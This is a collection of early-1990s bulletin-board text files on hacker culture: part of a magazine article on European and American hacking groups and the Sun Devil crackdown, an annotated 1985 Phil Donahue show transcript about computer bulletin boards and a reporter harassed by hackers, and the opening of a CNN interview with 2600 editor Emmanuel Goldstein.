even figure out what hackers are doing and why. All you can say is that
between them they have created a genuine digital underground, an electronic
bohemia where diverse subcultures can take root, where new ideas, dodgy
tech and weird science can flourish.

In Europe, the centres for hacking activity are Germany, Holland and
Italy. UK hacking remains relatively stagnant and disorganised. In part it's
down to the relatively high cost of computers and telephone calls. In part
it's down to a difference in attitude. It seems typical that the most famous
hack in Britain came when two hackers broke into Prince Philip's electronic
mailbox. As Andrew Ross points out in an essay on the subject in Strange
Weather, hacking in the UK has a quaint, 'Little England' air about it. Hugo
Cornwall, author of The Hacker's Handbook, has compared hacking to electronic
rambling and has suggested developing a kind of Country Code for computer
ramblers. It's all very benign, a matter of closing gates behind you,
respecting the lands you cross and never ignoring the 'No Trespassing' signs
you might encounter. As Ross says, this amounts to a kind of electronic
feudalism, with digital peasants respecting the inherited land rights of
information barons and never asking bigger questions about property, state
surveillance and the activity of corporations and governments.
 
The Europeans tend to take a more politicised, sceptical stance. The focus
for most hacking activity on the continent is the Hamburg-based Chaos
Computer Club, which organises meetings, lectures, publishes magazines and
books on the politics of information and holds an annual conference which
usually draws hackers from around Europe. The club, who's motto is "access
public data freely while protecting private data firmly", was formed by
Wau Holland after the publication of the A5 hacking magazine Datenschleuder
in 1982. An article in the mainstream press stimulated interest and
subscribers decided to set up the club.

With home computing a minority hobby in Germany during the mid-'80s, the
club couldn't really limit itself to one type of computer as a similar club
in the States might do. Instead it cut across product loyalties and hobbyist
pettines and brought together all computer users. Similarly, the club aimed
to be as open-minded about their activites. They weren't just interested in
swapping access codes and passwords. Instead Datenschleuder published
informed speculation about the way information technology might develop.
 
Realising that the majority of the public were unaccustomed to, and in some
cases frightened of, the new technology, they attempted to open up and
demystify thre computerised landscape. Alongside the regular magazine, they
have published four books on computers and hacking, including the essential
Die Hacker Bible One which reprints back copies of Datenschleuder and the
first 50 issues of TAP (aka Technological Assistance Program), a magazine
put together back in the '70s by phone phreakers (early tech-pranksters who
gained free phonecalls with gadgets like Blue Boxes and touch pads).
 
Like most hackers, the Chaos Club takes a critical stance towards the phone
companies of the world. As in the UK, the Germans have to live with high
prices for their phone services, something which has prevented the growth of
a network of computerised bulletin boards as in the US. In general,
communications regulations are very restrictive in Germany. Something as
simple as acquiring an extension telephone requires applications for
permission, excessive paperwork and extra charges. In this area the club acts
rather like a technoliterate consumer group, fighting to loosen the phone
company's monopoly and open up the system's potential to ordinary punters.

In many ways, the Chaos Club is determinedly respectable, at times more like
a special interest pressure group than a hacking club. These days they're
particularly concerned to distance themselves from what they see as
irresponsible elements within the digital underground, perhaps because some
of their members have performed some of the most notorious hacks in the
past. Hackers from the Chaos Club bust into NASA's system in the mid-'80s. In
addition, three years ago, it became apparent that some of the club's
members had hacked into Western military computers and tried to sell what
they found to the KGB. This somewhat sullied the carefully cultivated image
of openness and responsibility and the club has been through something of a
crisis. More recently, confidence has picked up and the last two annual
conferences have attracted around 500 hackers and other interested parties.
 
These annual get-togethers have become much more than just illicit swap meets
for Europe's computer intruders. They're part digital be-in, part electronic
think tank, part R&D lab, part informal high-tech trade fair. The centrepiece
is still usually the hacking rooms. Hooked into the phone system by means of
bundles of illegal extension cords, these feature rows of terminals on which
visitors could access networks around the world, call up the club's various
databases or tele-conference with members who couldn't make the event.
 
The 1991 event featured a room housing various rudimentary explorations into
the world of 'brain hacking'. Here people were swapping ideas about the
possibilities of making a real life version of the electrodes which feature
in William Gibson's cyberpunk novels and which allow users to jack into a
network and move from computer to computer purely by thought. The technology
that was actually up and running was little more than a biofeedback system
(basically an EEG machine which displays a user's brain waves in order to
help them to achieve particular frequencies and corresponding mental
states). Some present were talking about actually developing a brain-
controlled system, in which information could be moved around the screen
via something like ESP or telekinesis.
 
More functional future tech was demonstrated at the same conference by John
Draper, aka Captain Crunch, one of the first phone phreakers and a legend in
hacking circles, who had been flown in by the Virtual Travel Project, an
organisation designed to bring East and West together via technology. He
brought along an old Panasonic videophone which comes complete with a two
inch square display lens and a small camera. When hooked up to standard
telephone lines, the videophone can transmit still images taken by the built
in camera and transmit them to a similar telephone or computer equipped with
the right software. Draper was able to visually connect with the US in a
conference call that hooked up Hamburg, New York, the Electronic Cafe in
Santa Cruz in California and San Francisco.
 
Although the Chaos Club is the best-known European hacking group, others are
beginning to achieve a higher profile, particularly the self-styled Italian
Cyberpunks, who are based in Milan and produce the magazine Decoder, which
reads like a politically tougher version of Mondo 2000 and mixes hacker info
and socio-political opinion pieces on information technology with interviews
with the likes of William Gibson, underground comics and scratchy DIY
graphics. With its roots in Italian anarchist traditions and connections to
the free radio movement of the '70's, the Cyberpunks have tried to theorise
hacker activity and present it as a coherent form of political
protest. They're taken relatively seriously by Italian society at large and
their recently published Cyberpunk Anthology managed to make it onto the
bestseller list for several weeks. They are currently working on an English
translation which they hope to publish here (in the UK) by the Summer.
 
Like the Chaos Club, the Cyberpunks are less hung up on getting hold of the
latest technology and more interested in educating the public and spreading
information. Invited to participate in the Santarcangelo Arts Festival, held
in Rimini last Summer, they organised lectures on virtual reality and multi-
media, flying in speakers from Germany and Britain and running an
'information wall'. This comprised of a wall of old TVs playing feeds which
were processed by an Amiga video editing system and mixed raw footage of the
festival events, computer graphics and the Cyberpunks' own videos. There
were also plans to set up a pirate TV station and broadcast in a narrow 2km
band towards Rimini. Unfortunately, after technical problems and concern
voiced by members of the Mutoid Waste Company (also present at the festival)
that the material transmitted might be X rated, this had to be called off.

Whilst groups in Europe seem to be gradually evolving into artful campaigners
and consciousness-raising pranksters, the majority of US hackers have
remained simple tech freaks. However, things may be changing. US hacker
culture has been going through a crisis in the last two years. In a full-
blown moral panic, they have been systematically hunted down by the Secret
Service and have become the focus for hysteria reminiscent of the red scares
of the '50s. (A time magazine cover from 1988 talked about "The Invasion Of
The Data Snatchers".)

Things began to happen in January 1990 as the Secret Service began to arrest
members of The Legion Of Doom, one of the most celebrated US hacker groups,
on suspicion of having entered the computer systems of the Bell South
company. Although in many cases no charges were filed, electronic equipment
and discs were confiscated. things came to a head with Operation Sun Devil
in May 1990, which involved 28 raids in 14 days; 42 computers and 23,000
discs were confiscated, many of which have never been returned. Government
agents carried out dawn raids on teenage bedrooms across the US, confiscating
calculators and answerphones. All quite comical. Except things began to get
more serious. Raids became like precision strikes on terrorists and teenagers
found themselves threatened with jail sentences for accessing computer
systems with no password, copying files or just being vaguely
mischievous. Their offence might have been no more than the electronic
equivalent of walking on the grass or breaking and entering, but the
punishment they faced was ten times more severe.

In addition, the authorities began to target and close down electronic
bulletin boards. In the States, there are now boards for every obsession
going, every hobby, belief, vice or fad. So many that regulation of the kind
of information being circulated is increasingly difficult. For that reason,
it has been argued that the powers that be don't like the idea of boards
per se. Although a lot of the information that is circulated on some of the
more underground boards (how to build bombs, for example) is available
elsewhere, they feel spooked by the thougth that it can be accessed by
anyone with a computer.
 
They feel particularly spooked by the idea of hacker bulletin boards, and
have begun to charge people merely for allowing 'dangerous information' to
pass through their systems. The scapegoat for this anxiety was Craig Neidorf,
aka Knight Lightning, who ran the electronic magazine Phrack which was
circulated on a number of hacker boards. In February 1990, he was raided
and charged with circulating a document about the workings of the 911
emergency number. His computers were confiscated and the magazine put out
of business. When the case came to court in July, it was thrown out - the
information Neidorf had published was available to consumers for less than
$30. Nevertheless, Neidorf was wound up stuck with over $100,000 in legal
expenses.

Hacker reaction to all this has been varied. After receiving prison sentences
for their activities, the majority of the Legion Of Doom have decided to go
legit and have set up as Comsec Data Security Corporation, a computer
protection consultancy. Others have taken a campaigning stance reminiscent
of the Europeans. The East Coast hacker quarterly 2600, which published
hardcore hacking info on phreaking and accessing computer networks, has tried
to highlight the hypocrisy of the hacker busts. "An individual cannot take
a big credit checking corporation like TRW to court because they collect
personal data on them without his or her permission," 2600 editor Emmanuel
Goldstein comments. "But TRW could claim its privacy was violated if a hacker
figures out how to access their system."

Other organisations have been set up to raise concern about civil liberties
and freedom of speech, the most high profile being the Electronic Frontier
Foundation, which was set up by Mitch Kapor, a millionaire software pioneer,
along with other big cheeses from the computer industry (including Steve
Wozniak of Apple, an ex-phone phreaker), as a direct response to anti-hacking
hysteria. A self-confessed hacker/software pirate in the '70s, Kapor is
worried that the current panic may lead to the formation of restrictive
regulations which may hamper the development of cyberspace in the
future. However he isn't in favour of legalising hacking. He thinks hackers
should still be punished.
 
Although the EFF has had some success in its moves to end Secret Service
excesses, not all hackers are happy with the way it draws a line between the
old '60s hackers and modern computer intruders. "There are a lot of
similarities between these 15-year-olds who are playing around in corporate
computers and the 40-year-olds who played around with phones and are now
writing software somewhere," comments Emmanuel Goldstein. "They may be legit
now, but they weren't always legitimate". Goldstein is also sceptical of the
'cyberpunk' tag which hackers appropriated from the fiction of William Gibson
and Bruce Sterling, dismissing it as a fashion thing. Whilst it may have
helped to give hackers a sense of identity, the image of leather-clad
anti-social rebels backfired when the authorities started to take it
seriosly.
 
Something which places original cyberpunk writers like Bruce Sterling in a
tricky position. "I've had law enforcement people tell me that if they see a
copy of (William Gibson's) Neuromancer in a kid's bedroom when they're doing
a raid, they know he's bad, he's gone," he observes. "There are people who
use the word 'cyberpunk' as a synonym for computer criminal now. There's
little that we can do about it really." Except write a book, something
Sterling decided to do when anti-hacker hysteria reached his home town of
Austin, Texas. The Chicago Computer Fraud and Abuse Task Force seized
hardware and software from a texas SF publisher and made statements to the
local press that cyberpunks were dangerous. "Being quite well-known as a
cyberpunk myself, I thought I'd better find out what was going on". The
results of his investigations will be published as The Hacker Crackdown in
October in the US.
 
As an outsider, Sterling offers a refreshingly sceptical perspective on the
scene. Of the 5,000 or so hackers currently practicing in the States, he says
the majority are just mischievous teens, electronic joyriders who are more
curious than malicious. Most of them don't hack beyond the age of 22. They
get bored and get a life outside of cyberspace. He laughs off the idea that
hackers might be seen as radicals. "The idea that these are like fresh-faced
idealistic genius kids who are linked arm-in-arm to deal a telling blow to
the establishment is just bullshit. They all hate each other's guts. They
turn each other in at the drop of a hat."

Far from being proto-political rebels, he argues that young US hackers are
actually political footballs, part of a larger game which is about the future
and management of cyberspace. Thats why the rich software entrepreneurs of
the Electronic Frontier Foundation have become involved. "The EFF and their
civil liberties fellow travellers are an interest group like any other. They
shouldn't be shrouded in this air of 'Oh they're old '60s people, look how
idealistic and non-materialistic they are. These guys are pretty sharp
operators who've made a lot of money in the computer industry, and would now
like to get their mouse gripping mitts on some lever of political power that
is consonant with the amount of money they have and the influence they wield
in the business world".
 
A cynic might argue that the EFF aren't just concerned with the freedom of
speech. They really want to make sure that in the heat of hacker hysteria, a
set of excessive laws don't get passed which might restrict their business
operations in the future. This kind of thing is only to be expected, since
as Sterling says, the electronic community is expanding daily. In the rush to
go digital, hackers may even find themselves sidelined. "Every aspect of
society is moving into electronic networking and that includes hippies,
criminals, lawyers, politicians, bikers, knitting societies, even cops. Cops
have their own bulletin boards now. There are hacker cops. All these
subcultures and sub-groups are moving in, and in a while what was once called
hacker culture may get swamped by other kinds of electronic bohemia."
 
US hackers may have acted as the pioneers of the new electronic
landscape. But like the real pioneers who first explored the American West,
they may find it difficult to find a foothold in the new communities they
helped to create. The simple thing is to go in to business for the people
they formerly thought of as the enemy. Alternatively they could band together
in informal vaguely politicised pressure groups like the Europeans. But they
need to update their act. Otherwise they could even wind up a dying
breed. "In the end the thing about American hackers that'll kill them off is
that they're dilettantes," Sterling concludes. "They're not getting any
money for this. They're doing it for free, because it's like a cool
subculture do. They're doing it for power and knowledge. But anything these
jerk-offs can do for power and knowledge, a real operator can do for a lot
of money."

The pioneer age is over. The Net is here to grow. And as the digital
community expands and corporate control of computerised data increases,
hackers will have to raise their political consciousness if they intend to
fulfil their mythical role as electronic watchmen.

CONTACTS

Italian Cyberpunk magazine and book:          Dutch hacking magazine:
Decoder                                       Hack-Tic
Shake Edizioni                                PO Box 22953
Via Cesare Balbo 10                           1100 DL Amsterdam
20136 Milan, Italy                            The Netherlands

2600 Magazine - subscriptions, back issues and uncut NTSC video:
2600 Subscription Dept
PO Box 752
Middle Island
New York 11953-0752
USA

Tel: 0101 516 751 2600

Back issues of TAP can be found in the classified section of 2600.
 
Die Hacker Bible 1 is available in bookshops in Germany.

                Transcribed by Phantasm. 12th September 1992

X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X/\X
X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X\/X

THIS TRANSCRIPT SURROUNDS AN INCIDENT WHERE AS ONE OF P-80'S MEMBERS ACCESSED
TRW AND GOT THE CC NUMBER OF A NEWSWEEK REPORTER AND POSTED IT HERE AFTER
RICHARD SANDZA (NESWEEK REPORTER) HAD WRITTEN A NASTY ARTICLE ON THE SUBJ
OF HACKERS. A SPECIAL WAS ALSO DONE BY W57TH ST SHOW (CBS), A TRANSCRIPT OF
THAT SHOW IS ALSO AVAILABLE ON P-80.




TRANSCRIPT: PHIL DONAHUE SHOW
       Aired March 15, 1985

     EDITOR'S NOTES: This is an annotated transcript of the
highlights of "The Phil Donahue Show," which dealt with
computer communications and its ramifications. The New
York-based syndicated television show aired this morning in
many parts of the country.
     Donahue's guests for the discussion were Richard Louv,
author of a book called "America II: The Book that Captures
Americans in the Act of Creating the Future" and Newsweek
journalist Richard Sandza, who has reported on the exploits of
computer "crackers." 
     Also on the show were demonstrations of the CompuServe and
Source networks and regulars of the networking community,
including Chris and Pam Dunn of the CB forum and subscriber
Bill Steinberg.
     This file is quite long -- about 20K. For best results,
we'd suggest that you "scroll" it by entering S at the next
prompt. CONTROL S will freeze the display; CONTROL Q will
resume it.)
     Now, the show begins. The transcript...

     PHIL DONAHUE (to the audience): Do you know who can access
a computer to find out how much is in your checking account?
How many times you've been divorced? Whether or not you watch
dirty movies? I'm telling you.
     UNIDENTIFIED WOMAN IN THE AUDIENCE: Not true. Not true.
     DONAHUE: Whether you're bankrupt?
     THE WOMAN: Yes...
     DONAHUE: Who you owe money to. You know what else they can
do? They can get your credit card.
     THE WOMAN: Yes, but not if you're careful.
     DONAHUE: I don't know if it matters about being careful...
(turns to the stage to introduce guests)
     DONAHUE: This is Richard Louv. He's written a book
entitled "America II" ... This whole Orewellean thing is not
funny. You know that people are falling in love with computers.
I mean, with each other. There's X-rated computers. (Laughter)
I'm telling you and you're laughing.
     LOUV: (When) I got interested in this whole thing, I
(visited some bulletin boards and)...it's a good thing my
computer has a fan on it. I was up late one night and all this
X-rated stuff started coming up on my screen, I mean really
hardcore.
     DONAHUE: You're talking about dirty language. Not
pictures?
     LOUV: No, but it's a form of mating. (Laughter) There's a
lot of computer sex out there.
     DONAHUE (to the audience): You know what they do? They
have hot tub parties...Everybody's got a nickname and then if
you connect with somebody during this party, you and that other
person can go off by yourself onto this private channel, have a
little more X-rated conversation, and then if you want, go back
to the hot tub party. (Laughter) I'm telling you.
     LOUV: And there are hundreds of these computer bulletin
boards that are sexually oriented...
     DONAHUE: The problem is: 14-year-olds are doing it....
     DONAHUE (introducing second guest) Let me tell you what
happened to a Newsweek reporter. This is a real live computer
victim here. Richard Sandza was doing a piece for the
magazine...
     SANDZA: Yes, I did a piece talking about these bulletin
boards ... (to say) "Here's what's going on. There are these
bulletin boards and kids are using them to exchange illegal
information (such as) how to get your credit card." ...And they
came after me because they felt I had broken some sort of
pledge and told too much about their underground.
     DONAHUE: And you had a 'teletrial,' didn't you?
     SANDZA: I was put on teletrial, which is somewhat like the
hot tub parties, only I think I was going to be boiled in oil
in this one.
     DONAHUE: A jury and testimony and everything?
     SANDZA: Yes, they set up a bulletin board and people would
call in and place charges against me and say why I should be
punished. I was allowed to defend myself.
     DONAHUE: You were also getting hostile phone calls at
home? They got your phone number?
     SANDZA: They got my telephone number and began calling me
at home at all hours of the day and night. The worst thing they
did was they dialed into (a credit card company) and got the
whole list of my credit card accounts. They passed the credit
card numbers around the country and then they started using the
credit cards.
     DONAHUE: Your wife... you both must have been very, very
frightened by all of this.
     SANDZA: Well, this started on the day my wife went into
labor with our first child and I called the phone company from
the maturity ward to make sure my telephone wouldn't be
disconnected, as they had been threatened. They threatened to
blow up my house. I didn't know whether to take this seriously,
but I had seen messages (on bulletin boards) on how to make
letter bombs, nitroglycerin, pick locks, all these other
things, all the things necessary to blow up my house in San
Francisco.
     DONAHUE: Neo-Nazis have computers.
     SANDZA: They keep track of their hit lists and pass around
information so they can keep track of their enemies.
     LOUV: Yes, that's a national network. Any one of you can
call into the Neo-Nazi's bulletin board, if you have a
computer.
     SANDZA: Yes, if you want some hate mail, just dial in.
     DONAHUE: The KKK is talking to each other on bulletin
boards. A 14-year-old ... was apparently able to transmit how
to make nitroglycerin.
     UNIDENTIFIED SPECTATOR: How do you protect yourself from
this.
     SANDZA: I'm not sure you can protect yourself from this.
Credit bureau computers are kept so all of us can have credit
cards and they have information on just about...every adult in
the United States. The security's not (even) good enough to
keep these kids out.
     LOUV: I talked to one guy who gets into these (systems)
and he says that the TWR computer system is incredibly user
friendly.... I asked TRW about this, "How do you get these
numbers?" TRW has 30,000 customers -- banks, savings and loans
-- who call in every day to ask for a credit... They print
these numbers out. That's 30,000 leak points for your number.
     SANDZA: The kid who got my number, they found ... the
password and the number (in a) garbage can behind a bank in
Massachusetts.
     UNIDENTIFIED SPECTATOR: I think what you have to consider
is, we're blaming the computer in this. It's not the computer.
It's the people using it. (Applause.)
     SANDZA: You're absolutely right.
     ...
     (Donahue introduces Bill Steinberg at a computer terminal.
There's a demonstration of The Source's electronic conferencing
system, PARTICIPATION. The messages shown on the screen from an
online conferences about "sexual gadgets" and devices.)

     DONAHUE (to the audience): ... While we're watching this,
let's consider some of the legal questions. Can I insult your
mother on this thing? And if I do, can you sue me? How do you
find me? And who's responsible for that libel? Is it the
computer agency? The bulletin board iself? And who'
respsible... does the law oblige the peron running the
bulletin board to be responsible? ... You cannot send neo-Nazi
mail, hate mail, to Canada, for instance. It's illegal...but
you can transmit...
     SANDZA: Well, that's why they set up the bulletin board.
One of them is in northern Idaho... so that their followers in
Canada could dial in and get this information. It's very
effective, as I understand.
     ...
     DONAHUE: (Looking back at the computer screen. To
Steinberg:) What have you got there. Oh, it's another sex
thing. We'd better get off this thing...
     LOUV: This may be the only safe form of sex left.
(Laughter)
     DONAHUE: That's right. No diseases.

     (Steinberg then logs on to CompuServe Service's CB)

     DONAHUE: You know what would be fun? Let's get the
checking account of somebody in the audience... I bet you we
could.
     UNIDENTIFIED SPECTATOR: Use yours...
     (Laughter)
     ...
     
     (Donahue looks at the computer screen again, and notes
that one of the CB'ers said he was logged on from Montreal)

     DONAHUE: So we have an international communications. Now,
one of the things that obviously should concern us is that this
appears to get around laws that government international
(communications.) That could include information that might
hurt somebody. Racist information that might place somebody at
risk. Remember the CB craze. Wherever there ar people
communicating, there is going to be conflict. It's another
flag.
     LOUV: But it's also another opportunity for social
activism. Greenpeace now has its own computer bulletin board
network. So does the anti-nuclear movement and I think we're
entering a period ... of strange forms of social activism, and
this is going to be one of those forms.
     SANDZA: It replaces the telephone in a lot of cases...The
difference here is that you're completely anonymous and you
don't need somebody's telephone number... Maybe there shouldn't
be any laws that govern what you say back and forth. There
certainly aren't on the telephone. The difference here is that
you could keep an actual record (of what was said) on paper and
then you could rebroadcast that somewhere else.
     LOUV: In a sense, this is a return to Tom Paine who
printed off cheap pamphlets and handed them out in Boston.
These political groups have instant access to information. For
instance, how to set up a protest against (a nuclear plant).
They can find out in San Francisco immediately how it was done
on the East Coast...That has enormous power for the future and
I'm not sure many of us have fully realized that.

     (Donahue introduces Chris and Pamela Dunn in the audience)

     DONAHUE: They look happy, don't they? Well, they are. Very
happy. (To the Dunns) You're married, aren't you? They met via
computer terminals. How did this happen, and were you alone, or
at work, or...?
     PAM DUNN: I was alone at home and I was using a terminal
to access CompuServe, utilizing the CB network. That was a few
years ago now, when it was young and there weren't that many
people around. Chris and I started talking to each other. At
first, I didn't even know he was male, because we were both
using handles to have that anonymity.
     DONAHUE: What were your handles?
     PAM DUNN: Zerbra3
     CHRIS DUNN: ChrisDos, which is a computer term.
     PAM DUNN: We got to talk to each other quite frequently
and we started having parties. That was the thing to do in CB
was to have actual parties so people could meet each other. And
I came from Chicago to New York and met and (laughs) made
history.
     ...
     CHRIS DUNN: (The parties became national parties
eventually). I flew to San Francisco to meet some people, just
to have a nice time. They didn't have anything to do with sex
or any of this other stuff. We were just enjoying each other's
company and talking to each other. The thing about computers
is, they're just a tool. People are doing the same thing with
them that they've done for ages...It's not the computer; it's
the people running them.
     DONAHUE: Pamela, you're a shy person. You're not the kind
to be found in a singles bar.
     PAM DUNN: Absolutely not, and I've found this is an
incredible way to meet, not just a potential spouse, but
friends, people you have things in common with, people that you
don't have things in common with but ways to broaden your
horizons by encountering them.
     CHRIS DUNN: And you don't have to be a technie type. She's
a zookeeper...
     DONAHUE: And I assume you can tell a jerk on the screen
maybe even easier than you can ...
     PAM DUNN: It takes practice. You get suckered in a few
times...(Laughter)
     DONAHUE: Well, there's no guarantees when you meet them
(away from the computer systems.)...
     ...
     DONAHUE: (Addressing a portion of the audience) Now am I
to understand that all you people refer to yourselves as
'users'? You know, 'user' has become a bad word in our culture,
but we won't (laughs) suggest that you're doing anything
wrong...

     (While walking through the audience, Donahue talks with a
woman who says she used to call a number of bulletin boards,
but after receiving big phone bills, restricted her BBS-hopping
to local New York boards.)

     DONAHUE: But there are people who can use this equipment
without paying the phone company?
     SANDZA: Sure. That's one of the things they exchange on
these illegal bulletin boards. Most of these people (in the
audience) probably haven't been on illegal bulletin boards and
aren't interested in being on them. But (the bulletin board
will) spread information on ... how to beat the phone
company... so you don't have to worry about those big phone
bills...
     ...

     (Donahue returns the the CompuServe CB demonstration. He
notes that many users of CB and other "real-time" conferences
send messages such as "<waving>" and "<hugs!>," noting this is
"really a warm medium.")

     LOUV: You know what? One thing they've found about this,
though, is that you'd think that you'd be kind of cold and
technical using this, with the language? The opposite is true.
There's a term, "flaming" (for) when people use electronic mail
(and) exaggerate everything. You see exclamation points across
the screens. Everything's exaggerated. People lose their
tempers. Executives will swear on these things, when you'd
never see them swear in the board room... So everything is hot
on this medium. It's not a cold medium.
     DONAHUE: (looking at the CB demonstration.) Can you see
this? We've already got a wise guy. "Hi Phil. I always liked
Marlo Thomas better." (from a CB'er with the handle of "MOM")
     (Laughter and applause)...
     LOUV: You need to put this into the context, or culture
we're in. I've described it as "America II." It's a culture in
which many of us are drawn into condos with high-security
systems. More and more things are done in the home. We're more
and more isolated. But just when you think that (we've) created
an America II where everybody stays inside and (doesn't) touch
or anything, this kind of communications comes along. That hot
medium that I find very fascinating. We're finding new ways to
communicate...
     SANDZA: The flipside of this is the misuse of these
bulletin boards that pass out information about how to break
the law, how to invade your privacy, how to make bombs...These
boards are completely anonymous. I can say anything I want
about you. You can say anything you want about me. This
information moves around at the speed of light and if you
wanted to spread my credit card around the country, you could
do it in a flash...
     LOUV: This lady back here who said it's not the computer,
it's how we use it is exactly right. It's part of the new
American culture and we can't get around it...
     
     <COMMERCIAL BREAK>
     
     (A woman in the audience comments to Donahue that the
computer's seem like "adult toys" to her).

     LOUV: Phil, there's something very ominous that doesn't
really have to do with the privacy issue and that's the split
between America I and America II. The America of poor blacks
and chicanos and people who have no access to this stuff. This
stuff is rich kids' toys for the most part....

     (Another woman says her child saved up to buy his own
computer.)

     LOUV: Increasingly, it's available to those people...but
even when it's available, studies have shown, often times they
haven't been prepared by their education to use it...They use
it by rote memory. They don't use it in the intutive kinds of
ways that middle class are using them.
     DONAHUE: It's another vehicle to widen what we have
already been told by a national commision is a gap between the
two Americas.
     LOUV: There's a study in Silicon Valley ... of kid who use
computers.The kids of the engineers and computer
designers....40 percent of (them) had computers. Ten miles
away, the kids of the parents who... put those computers
together, 1 percent of those kids have computers...

     (A woman comments she feels "shut out" by not knowing
about computers.)

     LOUV: These are the people of America I -- not shut out of
the world so much as left before... The people of America II
are going to be talking internationally... There's a computer
bulletin board in Japan (with which) you can make a local call
and talk to anyone in the world. What about the people of
America I who are being left behind?

     (A woman spectator asks: are these people spending too
much time with computers?)

     DONAHUE: Good question.
     SANDZA: Perhaps they are. But we ask ourselves what's
going to happen in the '80s, as we move from an industrial
society to a service society when computers will do the high
tech jobs of the future. These kids...are the ones who are
going to be ready for those jobs.

     <COMMERCIAL BREAK)
     
     (Donahue talks with a man in the audience who says he
operates a local computer bulletin board and is proud of the
fact that its a "clear board." The man notes that his board
deals primarily with sharing computer information.)

     DONAHUE (to the audience): You know you can get electronic
graffiti. It's another opportunity to display your idiocy, so
how are you going to police that? Who's going to take it off?
And if somebody's libeled...

     (Woman asks if it should be illegal to have x-rated
bulletin boards.)

     SANDZA: How are you going to enforce that law? The only
way you can enforce that law is to have the people who are the
guardians of these young people...(interrupted)

     (Woman says there's room for both America I and America
II, that she hopes some people are still "writing poetry and
kids going out sailing.")

     LOUV: One of the things I discuss in the book is
that....America II doesn't have to end up where it looks like
it's heading. Look -- how many of your communities have spent
money on parks lately?...This (computing) is the new
recreation, the new outdoors and we've got to start looking at
these things if...we really want to balance society...
     UNIDENTIFIED SPECTATOR: Are we saying that even though
there are a lot of people doing things that are illegal,
there's no way to police it so it's all right?
     SANDZA: It's virtually impossible to police it...the law's
beginning to emerge. The federal goverment passed a law last
year making it illegal to trespass in a computer, but it
applies only to government computers. The section (dealing
with) private computers was deleted as it went through
Congress.
     ...
     DONAHUE: It's a nightmare when you think about it. Can
they access an (aviation computer)? Can they send your plane to
the wrong city? Can they send your plane to the wrong runway?

     (Sandza notes that crackers were "into the computer" that
kept time on the Olympic races.)

     <COMMERCIAL BREAK>

     (Donahue looks at the computer screen again. It's now
displaying The Source's PARTICIPATE this time with an
electronic conference on "Single Parenting.")

     LOUV: The point isn't the law...the law has to be changed,
obviously. But that isn't the point. The point is what kind of
alternatives do we provide for kids? This is not a negative
technology. It's neutral. Kids have to have an alternative. We
have to start looking at our cities and countryside and our
small towns and figure out how to make them more humane for
children.
     

     (Man in the audience said he'd like to hear more about
Chris and Pam Dunn.)
     
     DONAHUE: I would too... And they're still married even
though the show's almost over. (Laughter) How long did you
communication through the computers before you actually met?
     PAM DUNN: About six months before we actually met.
     CHRIS DUNN: We got together a few times back and forth.
She was throwing a party and I went to it. The rest was just
plain old love. It happened that way.
     DONAHUE: Where was the first time you met?
     PAM DUNN: Chicago.
     DONAHUE: He came to see you.
     PAM DUNN Yes, still old-fashioned...
     DONAHUE: Did you take him to see the Cubs or the Sox?
     PAM DUNN: I took him to see the zoo. (Applause and
laughter.)

     (Woman says she wants to have nothing to do with computers
asks if she'll have no choice in 20 years.)

     SANDZA: The technology is headiang toward making it much
easier for people who know nothing about computers to use them.

     (Woman asks Sandza what about what the punishment was in
his "teletrial" -- "did they flip the switch or what?")

     SANDZA: No. I made a deal with a friend who's a hacker who
crashed the system... he essentially blew up the courthouse.
(Laughter.)
     
<COMMERCIAL BREAK>
     
     (Man in the audience says that something to consider is
that "if information is currency, then who's minding the
bank.")

     DONAHUE: And what are the censorship rules? Who decides?
     
     (Following the usual format for the Donahue show, the
camera fades out with people in the audience still asking
questions. As the show ends, one man is asking if the computer
cracker ever break into computers in the Soviet Union. No
answer is record.)
     -End of transcript.-


ORIGINALLY POSTED ON AND DOWNLOADED FROM P-80 SYSTEMS
                 Q&A with Emmanuel Goldstein of
                 2600: The Hacker's Quarterly

                 (CNN) -- Emmanuel Goldstein is the
                 editor-in-chief of 2600: The Hacker Quarterly and
                 hosts a weekly radio program in New York called
                 "Off the Hook." 

                 1. How do you define hacking? 

                      Hacking is, very simply, asking a lot of
                      questions and refusing to stop asking. This
                      is why computers are perfect for inquisitive
                      people -- they don't tell you to shut up
                      when you keep asking questions or
                      inputting commands over and over and
                      over. But hacking doesn't have to confine
                      itself to computers. Anyone with an
                      inquisitive mind, a sense of adventure and
                      strong beliefs in free speech and the right
                      to know most definitely has a bit of the
                      hacker spirit in them. 

                 2. Are there legal or appropriate forms of
                 hacking? 

                      One of the common misconceptions is that
                      anyone considered a hacker is doing
                      something illegal. It's a sad commentary on
                      the state of our society when someone who
                      is basically seeking knowledge and the truth
                      is assumed to be up to something nefarious.
                      Nothing could be further from the truth. 

                      Hackers, in their idealistic naivet, reveal
                      the facts that they discover, without
                      regard for money, corporate secrets or
                      government coverups. We have nothing to
                      hide, which is why we're always relatively
                      open with the things we do -- whether it's
                      having meetings in a public place or running
                      a system for everyone to participate in
                      regardless of background. The fact that we
                      don't "play the game" of secrets also makes
                      hackers a tremendous threat in the eyes of
                      many who want to keep things away from
                      the public. 

                      Secrets are all well and good, but if the
                      only thing keeping them a secret is the fact
                      that you say it's a secret, then it's not
                      really a very good secret. We suggest using
                      strong encryption for those really interested
                      in keeping things out of the hands of
                      outsiders. It's interesting also that hackers
                      are the ones who are always pushing strong
                      encryption -- if we were truly interested in
                      getting into everyone's personal affairs, it's
                      unlikely we'd try and show them how to
                      stay secure. There are, however, entities
                      who are trying to weaken encryption.
                      People should look toward them with
                      concern, as they are the true threat to
                      privacy. 

                 3. What in your mind is the purpose of
                 hacking? 

                      To seek knowledge, discover something
                      new, be the first one to find a particular
                      weakness in a computer system or the first
                      to be able to get a certain result from a
                      program. As mentioned above, this doesn't
                      have to confine itself to the world of
                      computers. Anyone who's an adventurer or
                      explorer of some sort, or any good
                      investigative journalist, knows the feeling of
                      wanting to do something nobody has ever
                      done before or find the answer despite
                      being told that you can't. One thing that all
                      of the people involved in these endeavors
                      seem to share is the feeling from outsiders
                      that they're wasting their time. 

                 4. Are you a hacker? Why? Or why not? 

                      Absolutely. It's not something you can just
                      erase from your personality, nor should you
                      want to. Once you lose the desire to mess
                      around with things, tweak programs and
                      systems, or just pursue an answer doggedly
                      until you get a result, you've lost a very
                      important part of yourself. It's quite
